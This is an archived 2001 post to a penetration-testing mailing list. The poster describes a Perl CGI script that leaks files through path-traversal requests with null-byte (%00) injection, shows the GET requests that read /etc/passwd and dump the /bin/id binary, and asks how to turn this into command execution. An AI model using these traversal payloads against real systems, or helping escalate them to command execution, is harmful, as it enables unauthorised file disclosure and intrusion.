Home page logo
/

pen-test logo Penetration Testing mailing list archives

vulnerable perl script?
From: otaner () gmx ch
Date: Thu, 18 Oct 2001 19:07:27 +0200 (MEST)

Hi,

I'm doing a pen test and I found a perl script, which seems to be
vulnerable. If I do a get,
for
example:

GET
/cgi-bin/whatever.pl?variable1=test%00&variable2=../../../../../../etc/passwd%00

I can see the content of the passwd file. But when I try to execute a
command, for example:

GET
/cgi-bin/whatever.pl?variable1=test%00&variable2=../../../../../../bin/id%00

I get this garbage and some interesting stuff:


ELF t4P4
(44

ÔééììvÈDD¨/usr/lib/ld.so.15HF$<#%C!-5AD,E0 () 2:(G8'4>3?;+B9&)*1/6= 
".7Ôèäd 
$ < T t ¼ ô ,
0
°&#338;¸4getopt_startgetpwuid_environ_end_iob_ex_register__flsbuf_GLOBAL_OFFSET_TABLE_geteuidatexitexitgettext_inittextdomainsetgrentgetuidgetpwnam___Argvsetbuf_DYNAMICgetgrentprintf__iobsetlocale_exit_ex_deregisterenvironperror__cg89_usedgetgrgid__cg92_usedgetegid__fnonstd_usedoptindstrcmp_edata_PROCEDURE_LINKAGE_TABLE___fsr_init_valuegetgroups_etext_lib_versiongetgidmain__environ_lock_finifprintfendgrentlibc.so.1SUNW_1.1libc.so.1Á
='&#8216;Ëð2ìp/°:
...
more garbage
....
`¿ÿô&#8364;§ () @@º&#8364;2&#8364; ¢`&#8364;¦
ü&#8364;¤&#8364;&#376;āÇàèSUNW_OST_OSCMDaid: invalid user name: "%s"
getgroupsgetgroups
groups=%u(%s)Usage: id [user] id
-a
[user]
%s%u%s%u%s=%u(%s)(%s)D00¿ÿó<0¿ÿðH0¿ÿíT0¿ÿê`0¿ÿçl0¿ÿäx0¿ÿá&#8222;0¿ÿÞ T $P 
ÿþó&#8364;ÿþý8ÿþüÈÿþý8uid euid gid egid@(#)SunOS
5.7
Generic
October
1998.interp.hash.dynsym.dynstr.SUNW_version.rela.ex_shared.rela.bss.rela.plt.text.init.fini.exception_ranges.rodata.rodata1.got.plt.dynamic.ex_shared.data.data1.bss.comment.shstrtabÔÔ
 èèü
ää&#8364;dd&#382;oÿÿþ   - $ 



I'm not sure but I think, the %00 is the problem and without %00, I get no
results. Does anybody know how I can execute my commands? I tried ; and ¦,
but
nothing happened. I'm not able to see the source of the perl file.

any help would be appreciated

otaner


-- 
GMX - Die Kommunikationsplattform im Internet.
http://www.gmx.net


----------------------------------------------------------------------------
This list is provided by the SecurityFocus Security Intelligence Alert (SIA)
Service. For more information on SecurityFocus' SIA service which
automatically alerts you to the latest security vulnerabilities please see:
https://alerts.securityfocus.com/


  By Date           By Thread  

Current thread:
  • vulnerable perl script? otaner (Oct 18)
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]
AlienVault